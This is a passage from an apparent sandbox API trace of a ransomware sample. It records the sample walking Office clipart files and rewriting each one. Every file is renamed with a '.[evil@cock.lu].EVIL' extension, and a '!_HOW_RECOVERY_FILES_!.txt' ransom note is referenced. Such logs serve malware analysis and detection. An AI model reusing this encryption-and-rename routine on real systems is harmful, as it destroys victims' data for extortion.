lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3820, lpOverlapped=0x0) returned 1 [0152.451] CloseHandle (hObject=0x1a8) returned 1 [0152.451] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.451] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.451] __uncaught_exception () returned 0x84b1160800 [0152.451] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.451] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf.[evil@cock.lu].evil")) returned 1 [0152.452] ??_V@YAXPEAX@Z () returned 0x1 [0152.455] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF", dwFileAttributes=0x200) returned 0 [0152.456] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.456] wcsstr (_Str="J0232797.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.456] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF") returned 69 [0152.456] wcscmp (_String1="J0232797.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.456] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0232797.WMF") returned 0x0 [0152.456] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF") returned 0x45 [0152.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.458] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x899c, lpOverlapped=0x0) returned 1 [0152.466] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.466] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.466] _errno () returned 0x84b1160840 [0152.467] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.467] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x89a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x89a0, lpOverlapped=0x0) returned 1 [0152.467] CloseHandle (hObject=0x1a8) returned 1 [0152.467] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.467] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.467] __uncaught_exception () returned 0x84b1160800 [0152.467] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.468] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf.[evil@cock.lu].evil")) returned 1 [0152.469] ??_V@YAXPEAX@Z () returned 0x1 [0152.472] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF", dwFileAttributes=0x200) returned 0 [0152.472] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.473] wcsstr (_Str="J0232803.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.473] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF") returned 69 [0152.473] wcscmp (_String1="J0232803.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.473] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0232803.WMF") returned 0x0 [0152.473] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF") returned 0x45 [0152.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.476] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4de6, lpOverlapped=0x0) returned 1 [0152.484] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.484] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.484] _errno () returned 0x84b1160840 [0152.484] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.484] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4e00, lpOverlapped=0x0) returned 1 [0152.484] CloseHandle (hObject=0x1a8) returned 1 [0152.484] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.484] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.484] __uncaught_exception () returned 0x84b1160800 [0152.484] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.485] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf.[evil@cock.lu].evil")) returned 1 [0152.485] ??_V@YAXPEAX@Z () returned 0x1 [0152.489] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF", dwFileAttributes=0x200) returned 0 [0152.489] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.489] wcsstr (_Str="J0233512.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.489] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF") returned 69 [0152.489] wcscmp (_String1="J0233512.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.489] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0233512.WMF") returned 0x0 [0152.489] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF") returned 0x45 [0152.489] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.491] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x26e8, lpOverlapped=0x0) returned 1 [0152.507] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.507] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.507] _errno () returned 0x84b1160840 [0152.507] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.507] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2700, lpOverlapped=0x0) returned 1 [0152.507] CloseHandle (hObject=0x1a8) returned 1 [0152.507] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.507] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.507] __uncaught_exception () returned 0x84b1160800 [0152.507] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.508] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf.[evil@cock.lu].evil")) returned 1 [0152.508] ??_V@YAXPEAX@Z () returned 0x1 [0152.511] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF", dwFileAttributes=0x200) returned 0 [0152.511] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.511] wcsstr (_Str="J0233665.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.511] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF") returned 69 [0152.511] wcscmp (_String1="J0233665.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.511] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0233665.WMF") returned 0x0 [0152.511] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF") returned 0x45 [0152.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.513] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x312c, lpOverlapped=0x0) returned 1 [0152.521] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.521] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.521] _errno () returned 0x84b1160840 [0152.521] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.521] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3140, lpOverlapped=0x0) returned 1 [0152.522] CloseHandle (hObject=0x1a8) returned 1 [0152.522] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.522] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.522] __uncaught_exception () returned 0x84b1160800 [0152.522] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.522] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233665.wmf.[evil@cock.lu].evil")) returned 1 [0152.523] ??_V@YAXPEAX@Z () returned 0x1 [0152.527] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233665.WMF", dwFileAttributes=0x200) returned 0 [0152.527] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.527] wcsstr (_Str="J0233992.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.527] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF") returned 69 [0152.527] wcscmp (_String1="J0233992.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.527] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0233992.WMF") returned 0x0 [0152.527] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF") returned 0x45 [0152.527] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.529] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x975e, lpOverlapped=0x0) returned 1 [0152.534] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.534] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.534] _errno () returned 0x84b1160840 [0152.535] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.535] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x9760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9760, lpOverlapped=0x0) returned 1 [0152.535] CloseHandle (hObject=0x1a8) returned 1 [0152.535] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.535] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.535] __uncaught_exception () returned 0x84b1160800 [0152.535] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.536] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233992.wmf.[evil@cock.lu].evil")) returned 1 [0152.537] ??_V@YAXPEAX@Z () returned 0x1 [0152.540] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233992.WMF", dwFileAttributes=0x200) returned 0 [0152.540] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.540] wcsstr (_Str="J0234000.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.540] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF") returned 69 [0152.540] wcscmp (_String1="J0234000.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.540] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0234000.WMF") returned 0x0 [0152.540] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF") returned 0x45 [0152.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.542] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcec6, lpOverlapped=0x0) returned 1 [0152.549] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.549] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.549] _errno () returned 0x84b1160840 [0152.549] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.549] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xcee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcee0, lpOverlapped=0x0) returned 1 [0152.550] CloseHandle (hObject=0x1a8) returned 1 [0152.550] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.550] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.550] __uncaught_exception () returned 0x84b1160800 [0152.550] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.550] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234000.wmf.[evil@cock.lu].evil")) returned 1 [0152.551] ??_V@YAXPEAX@Z () returned 0x1 [0152.554] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234000.WMF", dwFileAttributes=0x200) returned 0 [0152.555] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.555] wcsstr (_Str="J0234001.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.555] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF") returned 69 [0152.555] wcscmp (_String1="J0234001.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.555] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0234001.WMF") returned 0x0 [0152.555] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF") returned 0x45 [0152.555] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.557] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b40, lpOverlapped=0x0) returned 1 [0152.566] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.566] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.566] _errno () returned 0x84b1160840 [0152.566] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.566] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4b60, lpOverlapped=0x0) returned 1 [0152.567] CloseHandle (hObject=0x1a8) returned 1 [0152.567] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.567] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.567] __uncaught_exception () returned 0x84b1160800 [0152.567] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.570] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234001.wmf.[evil@cock.lu].evil")) returned 1 [0152.571] ??_V@YAXPEAX@Z () returned 0x1 [0152.574] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234001.WMF", dwFileAttributes=0x200) returned 0 [0152.574] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.574] wcsstr (_Str="J0234376.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.574] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF") returned 69 [0152.574] wcscmp (_String1="J0234376.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.574] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0234376.WMF") returned 0x0 [0152.574] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF") returned 0x45 [0152.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.577] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x80d4, lpOverlapped=0x0) returned 1 [0152.585] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.585] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.585] _errno () returned 0x84b1160840 [0152.585] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.585] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x80e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x80e0, lpOverlapped=0x0) returned 1 [0152.585] CloseHandle (hObject=0x1a8) returned 1 [0152.585] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.585] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.586] __uncaught_exception () returned 0x84b1160800 [0152.586] fclose (in: 